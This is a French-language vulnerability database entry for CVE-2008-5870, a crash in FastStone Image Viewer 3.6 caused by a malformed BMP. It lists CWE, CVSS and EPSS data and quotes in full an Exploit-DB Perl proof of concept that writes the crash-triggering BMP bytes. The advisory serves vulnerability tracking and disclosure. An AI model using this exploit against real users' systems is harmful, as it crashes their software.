CVE-2008-5870 : Détail

CVE-2008-5870

A03-Injection
0.14%V3
Network
2009-01-08
17h13 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

FastStone Image Viewer 3.6 allows user-assisted attackers to cause a denial of service (application crash) via a malformed BMP image with large width and height values, possibly a related issue to CVE-2007-1942.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6673

Date de publication : 2008-10-04 22h00 +00:00
Auteur : suN8Hclf
EDB Vérifié : Yes

Name : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit Credit : suN8Hclf (DaRk-CodeRs Group), [email protected] Download: : http://www.FastStone.org Greetz : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Katharsis, all from #dark-coders and others;] PoC: #!/usr/local/bin/perl # Open file (File->Open) or simply click on the image miniature # FastStone Image Viewer v3.6 simply crashes # Tested on Windows 2000 SP4 #-----INFO---------------------- #EAX 00002847 #ECX 00000000 #EDX 00402818 dumped_F.00402818 #EBX 00402818 dumped_F.00402818 #ESP 00402818 dumped_F.00402818 #EBP 0012DF08 #ESI 00402818 dumped_F.00402818 #EDI 000161E8 #EIP 012F0447 # #Reason: "Access violation when writing to [00002847] #-----INFO---------------------- my $code="\x42\x4d\x3c\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00". "\x00\x00\xcc\x5f\x01\x00\xe8\x61\x01\x00\x01\x00\x18\x00\x00\x00". "\x00\x00\x06\x00\x00\x00\x98\x9e\x00\x00\x88\x77\x00\x00\xff\x02". "\xfd\x00\x00\x00\x00\x00\x41"; my $file="open_me.bmp"; open(my $FILE, ">>$file") or die "[!]Cannot open file"; print $FILE $code; close($FILE); print "$file has been generated\n" print "Credit: suN8Hclf, www.dark-coders.pl" # milw0rm.com [2008-10-05]

Products Mentioned

Configuraton 0

Faststone>>Image_viewer >> Version 3.6

Références

https://www.exploit-db.com/exploits/6673
Tags : exploit, x_refsource_EXPLOIT-DB
http://securityreason.com/securityalert/4878
Tags : third-party-advisory, x_refsource_SREASON